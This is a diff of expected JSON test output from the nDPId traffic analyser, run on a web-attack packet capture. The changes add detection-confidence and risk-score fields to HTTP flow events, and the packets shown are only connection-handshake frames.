 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":522,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347855324,"flow_last_seen":1499347860860,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347989244,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33404,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":523,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347856593,"flow_last_seen":1499347861860,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347989244,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33418,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":523,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347856593,"flow_last_seen":1499347861860,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347989244,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33418,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":523,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347856593,"flow_last_seen":1499347861860,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347989244,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33418,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":524,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347859192,"flow_last_seen":1499347864861,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347989244,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33444,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":524,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347859192,"flow_last_seen":1499347864861,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347989244,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33444,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":524,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347859192,"flow_last_seen":1499347864861,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347989244,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33444,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":525,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347860489,"flow_last_seen":1499347865862,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347989244,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33458,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":525,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347860489,"flow_last_seen":1499347865862,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347989244,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33458,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":525,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347860489,"flow_last_seen":1499347865862,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347989244,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33458,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":526,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347861783,"flow_last_seen":1499347866863,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347989244,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33472,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":526,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347861783,"flow_last_seen":1499347866863,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347989244,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33472,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":526,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347861783,"flow_last_seen":1499347866863,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347989244,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33472,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":527,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347863072,"flow_last_seen":1499347868864,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347989244,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33486,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":527,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347863072,"flow_last_seen":1499347868864,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347989244,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33486,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":527,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347863072,"flow_last_seen":1499347868864,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347989244,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33486,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":528,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347864367,"flow_last_seen":1499347869864,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347989244,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33500,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":528,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347864367,"flow_last_seen":1499347869864,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347989244,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33500,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":528,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347864367,"flow_last_seen":1499347869864,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347989244,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33500,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8478,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":599,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347989526,"flow_last_seen":1499347989526,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347989526,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34806,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8478,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":599,"flow_packet_id":1,"flow_last_seen":1499347989526,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347989526,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8S9BAAD4GegCsEAABwKgKMof2AFDafYYCAAAAAKACchCnLgAAAgQFtAQCCAoBPM3SAAAAAAEDAwc="}
@@ -3472,16 +3472,16 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8551,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":604,"flow_packet_id":1,"flow_last_seen":1499347998605,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347998605,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8MQxAAD4GlMSsEAABwKgKMohUAFBMT+e8AAAAAKACchDKZgAAAgQFtAQCCAoBPNawAAAAAAEDAwc="}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8552,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":604,"flow_packet_id":2,"flow_last_seen":1499347998605,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347998605,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiFT+qOY2TE\/nvaAScSA6WwAAAgQFtAQCCAoD5qgkATzWsAEDAwc="}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8553,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":604,"flow_packet_id":3,"flow_last_seen":1499347998606,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347998606,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0MQ1AAD4GlMusEAABwKgKMohUAFBMT+e9\/qjmN4AQAOXZYQAAAQEICgE81rED5qgk"}
-00700{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":495,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1499347807664,"flow_last_seen":1499347876003,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1870,"flow_tot_l4_payload_len":232685,"flow_avg_l4_payload_len":750,"midstream":0,"ts_msec":1499347999636,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32906,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":529,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347867086,"flow_last_seen":1499347872866,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347999636,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33526,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00806{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":495,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1499347807664,"flow_last_seen":1499347876003,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1870,"flow_tot_l4_payload_len":232685,"flow_avg_l4_payload_len":750,"midstream":0,"ts_msec":1499347999636,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32906,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":529,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347867086,"flow_last_seen":1499347872866,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347999636,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33526,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":529,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347867086,"flow_last_seen":1499347872866,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347999636,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33526,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":530,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347868358,"flow_last_seen":1499347873865,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347999636,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33540,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":530,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347868358,"flow_last_seen":1499347873865,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347999636,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33540,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":530,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347868358,"flow_last_seen":1499347873865,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347999636,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33540,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":531,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347869628,"flow_last_seen":1499347874866,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347999636,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33554,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":531,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347869628,"flow_last_seen":1499347874866,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347999636,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33554,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":531,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347869628,"flow_last_seen":1499347874866,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347999636,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33554,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":533,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347873465,"flow_last_seen":1499347878867,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347999636,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33594,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":533,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347873465,"flow_last_seen":1499347878867,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347999636,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33594,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":533,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347873465,"flow_last_seen":1499347878867,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347999636,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33594,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":534,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347874737,"flow_last_seen":1499347879867,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347999636,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33608,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":534,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347874737,"flow_last_seen":1499347879867,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347999636,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33608,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":534,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347874737,"flow_last_seen":1499347879867,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347999636,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33608,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8572,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":605,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348001148,"flow_last_seen":1499348001148,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348001148,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34926,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8572,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":605,"flow_packet_id":1,"flow_last_seen":1499348001148,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499348001148,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8pkpAAD4GH4asEAABwKgKMohuAFDUG39mAAAAAKACchCoWgAAAgQFtAQCCAoBPNksAAAAAAEDAwc="}
@@ -3499,20 +3499,20 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8611,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":608,"flow_packet_id":1,"flow_last_seen":1499348006334,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499348006334,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NJlAAD4GkTesEAABwKgKMoikAFAqsOqkAAAAAKACchDhQAAAAgQFtAQCCAoBPN49AAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8612,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":608,"flow_packet_id":2,"flow_last_seen":1499348006334,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499348006334,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiKQqwf7AKrDqpaAScSAFBgAAAgQFtAQCCAoD5q+xATzePQEDAwc="}
